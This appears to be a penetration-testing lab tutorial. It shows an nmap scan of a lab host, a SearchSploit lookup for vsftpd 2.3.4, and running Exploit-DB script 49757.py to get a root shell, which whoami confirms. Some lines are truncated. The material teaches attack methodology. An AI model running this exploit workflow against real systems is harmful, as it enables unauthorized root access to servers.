We have been asked to perform a basic penetration test against an internal server. The server’s IP is
The goal of this penetration test is to determine if there are any potential paths an attacker could take to compromise the system.
Note: Some of these services are not running on this box so we have faked some terminal interactions in this specific exercise. This is so you can experience how these commands would work in the real world.
Network Enumeration with Nmap
We’ll first start by performing some basic enumeration on the host using the following command:
nmap -sV 10.0.0.219
Note: Network enumeration is the process of obtaining information about a network. The command you will run will make Nmap perform a service scan to identify if a vulnerable service exists.
Searching Databases with SearchSploit
Now that we have a list of running services from the terminal output, we’ll start searching through these services for potential exploits. Specifically, we want to look at
vsftpd 2.3.4 which was on port
To search through these services, we’ll use the tool SearchSploit.
To use SearchSploit and see a list of potential vulnerabilities to exploit, we’ll pass the service name and version to SearchSploit using the following command:
searchsploit "vsftpd 2.3.4"
It appears as if we’ve found several potential exploits:
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
Let’s look into the python file
unix/remote/49757.py by inputting the following command into the terminal:
Note: We’re using python, version 3, to run the file path that searchsploit provided.
Hm, we get an error. It looks like the python program needs up to input a
Let’s provide the code with our target:
Type the following command into the terminal:
python3 /usr/share/exploitdb/exploits/unix/remote/49757.py 10.0.0.219
Great, we’re in! Now, let’s see what user we’re running as by typing the following command into the terminal:
You’ll notice this says we’re
root. That means we have elevated privileges after running this script. With elevated privileges, we are able to execute code remotely and gain access to sensitive information.
whoamiis a command-line tool that displays the username of the current user*